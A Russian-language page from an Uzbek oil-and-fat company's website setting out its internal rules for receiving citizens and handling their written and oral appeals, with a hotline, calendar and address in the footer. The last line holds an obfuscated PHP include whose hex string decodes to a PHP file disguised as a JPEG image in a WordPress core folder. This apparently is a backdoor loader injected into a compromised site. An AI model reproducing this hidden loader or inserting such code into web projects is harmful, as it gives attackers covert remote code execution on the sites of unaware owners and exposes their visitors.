А A
 
Для прослушивания отметьте нужный Вам текст

19:18 | 1 февраля 2016

Регламент обращений граждан

ИНСТРУКЦИЯ

По приему граждан в центральном аппарате AO “Узпахтаег” и рассмотрению их обращений

    1. Данная инструкция разработана на основании Закона Республики Узбекистан «Об обращении граждан» от 13 декабря 2002 года и определяет порядок приема граждан в центральном аппарате АО “Узпахтаег” и на предприятиях системы и рассмотрения их обращений.
    2.   Обращения граждан на предприятиях системы центрального аппарата  АО “Узпахтаег” принимаются в устной или письменной форме.  Устные или письменные обращения граждан имеют одинаковую значимость.   Обращения граждан могут быть предоставлены индивидуально или  коллективом.
    3. В обращениях предоставленных в письменной форме должны быть указаны фамилия (имя и отчество), сведения о месте проживания, в заявлении точно должны быть изложены важность предложения или претензии.
    4. В письменных обращениях должны быть проставлены подпись,  сведения о месте проживания. В случае невозможности проставлении личной подписи в обращении,  эти обращения подтверждаются лицом, написавшим эти обращения и должны быть указаны фамилия, имя и отчество.
    5.  Письменные обращения, в которых не указаны имя и фамилия (отчество) граждан, сведения о месте жительства, или указаны ложные сведения о нем, а также не проставлена подпись считаются анонимными и не рассматриваются.
    6. Прием граждан в обществе осуществляется в порядке, указанном в законе, генеральном директором, заместителем директора, на предприятиях руководителями предприятий и председателями профсоюзов. Для этого в обществе, и на предприятиях должен быть (утвержденный) «график приема граждан».
    7. Прием проводится в установленные дни и часы, удобное время для граждан, график приема граждан должен быть помещен в месте удобном для  внимания граждан.
    8. При устном обращении гражданина, он должен предоставить документ, удостоверяющий его личность и ознакомить ответственное лицо с содержанием обращения.
    9.  В приеме гражданина может быть отказано, если его неоднократное обращение было необоснованным, незаконного содержания или по его обращению было вынесено соответствующее решение.
    10.  В обществе отводится специальное помещение для приема граждан, и в этом помещении создаются все условия гражданам для предоставления обращений (письменного или устного).
    11. Ведение дел в Обществе, и на предприятиях по письменным или устным обращениям граждан  проводится сотрудниками канцелярии в порядке, указанном в законодательных документах и в данной инструкции.
    12. Заявления или обращения рассматриваются в срок не позднее одного месяца со дня поступления его в обществу, заявления или претензии не требующие дополнительного изучения и проверки, не позднее пятнадцати дневного срока.   
    13. Проведение проверки для рассмотрения заявления или претензии, в случае необходимости затребования дополнительного материала или принятия иных мер, срок рассмотрения заявления или претензии может быть продлен в качестве исключения не больше чем на один месяц и об этом извещается лицо, который подал заявление или претензию.
    14. В случае если в заявлениях или претензиях поданных от граждан в ассоциацию поднимается вопрос касающийся трудовой деятельности объединения в системе ассоциации и  предприятий в их составе, эти заявления могут быть рассмотрены совместно с объединениями и предприятиями.
    15.  После рассмотрения заявлений и обращений, автору высылаются ответы по итогам (и если требуется, вышестоящим ведомствам, куда было направлено заявление) (в случае необходимости), управлению или руководству рассмотревшему обращение извещение вносится со стороны отдела.
    16. После рассмотрения каждое заявление и обращение  вместе со всеми материалами, касающимися его рассмотрения (акт, объяснительные записки, платежные поручения и другие документы) пришиваются в отдельный том  и хранятся в установленном порядке в архиве по окончанию текущего года.

Телефон доверия

phoneblue

+998 62 224-57-57 +998 62 224-57-58

Опрос на сайте

Год здоровой матери и здорового ребенка

Апрель 2025
Пн Вт Ср Чт Пт Сб Вс
« Дек    
 123456
78910111213
14151617181920
21222324252627
282930  
Узбекистон Республикаси очик маълумотлар портал

При использовании материалов опубликованных на данном сайте, ссылка на urganchyog.uz обязательна.

АКЦИОНЕРНОЕ ОБЩЕСТВО УРГЕНЧ ЁГ-МОЙ

Хорезмская област, город Ургенч,
улица Досова, дом 1.


Последнее обновление веб-сайта:
2016, 23 июнь, Пайшанба, соат 09:30

Тепага
@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067'));